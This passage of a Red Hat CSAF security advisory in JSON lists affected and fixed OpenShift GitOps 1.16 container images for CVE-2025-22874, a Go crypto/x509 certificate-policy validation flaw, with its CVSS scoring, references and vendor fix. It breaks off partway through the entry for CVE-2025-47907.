"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2372320"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Go\u0027s crypto/x509 package. This vulnerability allows improper certificate validation, bypassing policy constraints via using ExtKeyUsageAny in VerifyOptions.KeyUsages.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: Usage of ExtKeyUsageAny disables policy validation in crypto/x509",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as an Important severity because the vulnerability was found in the certificate validation logic of the Verify function. When VerifyOptions.KeyUsages includes ExtKeyUsageAny, certificate chains containing policy graphs may bypass certificate policy validation. This flaw allows an attacker to trick the system into accepting an invalid certificate, potentially enabling spoofing attacks, the issue weakens trust decisions in affected cases and impacts system integrity. Confidentiality and availability are not affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x"
],
"known_not_affected": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-22874"
},
{
"category": "external",
"summary": "RHBZ#2372320",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2372320"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-22874",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22874"
},
{
"category": "external",
"summary": "https://go.dev/cl/670375",
"url": "https://go.dev/cl/670375"
},
{
"category": "external",
"summary": "https://go.dev/issue/73612",
"url": "https://go.dev/issue/73612"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/ufZ8WpEsA3A",
"url": "https://groups.google.com/g/golang-announce/c/ufZ8WpEsA3A"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3749",
"url": "https://pkg.go.dev/vuln/GO-2025-3749"
}
],
"release_date": "2025-06-11T16:42:52.856000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-10-09T18:47:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:17730"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:645d19854b1ce41c0d260de0b210749453269f7418059be41c854f2e9bbf000c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:6eb5d4b468ebf1732f466caebba617c30fb406623274a3acf7511805121e1eff_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:efd3f2795152ae8173722eb6695530bc5a986ea2572967038043d67eb65ead0c_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:f1160e0c44027b8a6f04e207020eb2b64683d271cf9153836ecce8c67579463b_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:6909fc584a220d7f3cb684d152d9c9167d177873f83437891a04d85b7a24d851_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:8deb789cb88a48e8f887d5b33858a7d11e5d9d240290ee48bd7d4f32243dd38f_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:b867573876278eb19c89dcd4fac0c68f16a0daccfedaeee16589decac44ace75_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:c2e038f48d3ccfead013900cc72c201fc55bfd3b6fcb9eb5560a24687e5ff283_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2f35704b4a52925cbe845743de00c271ac07accd5a59c2d215b2b80491f72c0b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:6f73f190baf0b9ce6be84db1bda73bc9cccbaf11b2b23751c449fa7506a2fc94_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:914953316db02f903e76941af5716c25aa38c73ace8b297f11fbcb6d859aff6f_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:d1aaa9ae4291f7472576393040b4862cad491251c744cee7c6730a1d35e5f104_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: Usage of ExtKeyUsageAny disables policy validation in crypto/x509"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:24d8c9b3d5e2302d86a6522bb8997cdf203a1121825a1a84834a58c972561334_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:2e056fd5830a22ec87570415ee3621a8951386f86286970d21fcf76f5eb40a5b_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:4dff7f7534e02fcc989f8c58646acf0a8de6eb950514a9eaebe0d4db7f799bb8_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:f505ecf3600e5f453867a4c9986c814ff774738387b135b881bbefdb64a8b6c0_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:190f9d93d0383e9d67079af14eacc7d960895883106d58819a2dd928d07df227_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:41b064e75d6e1381582ed9ae018c93b72a0c380a02dc91e542cd8748b4de20b2_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:89b76d9ac08f2d7852e484f5cd3ba7c2aee0f9ff3444eb8a9344474125220042_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:f1ad261aa5b50b368a5a2619ec79e6f1a14b4f218ffc157a5c2e0c8f07c0b007_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:3caf15f8693245181eb1dc3adbf177c3be3095701b4fbb9ab64ec96af345855f_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:989eefed937fc36a100303b24ae8fd4d1a88599a3cd0160cfac77180cc188a3b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:bdd0a289775ce41a8b495e02626f2e84b39f27d8eab8e351faf13bd46c8bb843_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:c5a94378fa6de06979845d1dd57ee840d1c1e63bdec31a816ad80703dd677c29_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:400f6dc94a40d30e9bf08a6bbbdb69d03bac59f84c4d66620fa7d99b4b5a96f5_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:af6a17b989475611cccb8dde3fc4b04c07d83c808a9e36537e04fc220357836c_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:bc2ef6df807856991b716adea85d114c5f61a6ea02d1d3dddc86ddd61bacab76_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c9d9ee712c5432f2ddf0985665a1ebc1ab8dfa49ddfd4829fd0eea8cb29c745d_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:0b76c3b83e7ffa1d650fdca227fa18a31a08339828160683ae7ff5a7a0bc6760_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:3a2a9cea446951e9ce350b51197a8a5c01691ec7b5ffc149a66ca9e3134a82a0_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:94e8b2edf66de66d8ed7a9acaeb49ecd11e07f828d0a4be642d87cdedbf6e8a4_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:de943611e032cfc21ffe468a4c5ebf3e4dc843cf33f1d476ed26504445cf3f24_s390x",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:78dc89a4a9dfb8dcf93224fd9a3caa63ea1551f8da73a88aebb284123d4a2962_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:20eba0b58edf23d29297fd53e76fbc2206f87b7a34ee83e98dcf013802fb6c2b_ppc64le",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:52ffe54a0935e54b8d7712a01f65beb6030524a6bc5ea3ae2f59bc1b75fb5ef7_amd64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:814349bf64d3571529ef554df85dfb765446ce199fd771552b236a88ca56a362_arm64",
"Red Hat OpenShift GitOps 1.16:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:c7c68a98f7cf428c7f228a66c85d42ddc709a2bd453c9bcfb47899b7f2e1fed0_s390x",
